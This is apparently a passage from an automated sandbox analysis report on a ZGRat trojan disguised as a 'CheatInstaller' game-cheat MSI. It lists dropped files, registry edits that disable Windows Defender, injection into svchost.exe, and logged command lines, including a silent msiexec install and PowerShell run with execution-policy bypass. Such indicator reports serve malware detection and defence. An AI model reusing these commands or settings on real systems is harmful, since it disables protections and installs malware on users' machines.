| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6424 created 3480 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
| PID 6424 created 3480 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
| PID 6424 created 3480 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
ZGRat
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Windows\Installer\MSIA5F4.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Windows\Installer\MSIDAE3.tmp | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe | N/A |
| N/A | N/A | C:\Windows\Installer\MSIA5F4.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe | N/A |
| N/A | N/A | C:\Windows\Installer\MSIDAD1.tmp | N/A |
| N/A | N/A | C:\Windows\Installer\MSIDAD2.tmp | N/A |
| N/A | N/A | C:\Windows\Installer\MSIDAE3.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3472 set thread context of 6424 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe |
| PID 6424 set thread context of 540 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\System32\svchost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI703B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e575edd.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6430.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI63E0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI70C9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7273.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA604.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6E54.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7158.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDAE3.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5FB5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7262.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDB13.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6401.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI705B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6E44.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6FFB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA259.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e575ed9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5F75.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6043.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6074.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6064.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7128.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA5F4.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDAD1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDAD2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e575ed9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6023.tmp | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\RUN.exe
"C:\Users\Admin\AppData\Local\Temp\RUN.exe"
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe
.\Install_YTTCHTs.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E2038926FB8E89C51046C2EC332A3A62 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532442 " ALLUSERS="1"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3E8C0A75A229AFD3985AFCE17844D936
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss60EF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi60DD.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr60DE.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr60DF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1763FE87C3B24A10656D2C12B0EB9F30 E Global\MSI0000
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\timeout.exe
timeout /t 10 /nobreak
C:\Windows\Installer\MSIA5F4.tmp
"C:\Windows\Installer\MSIA5F4.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
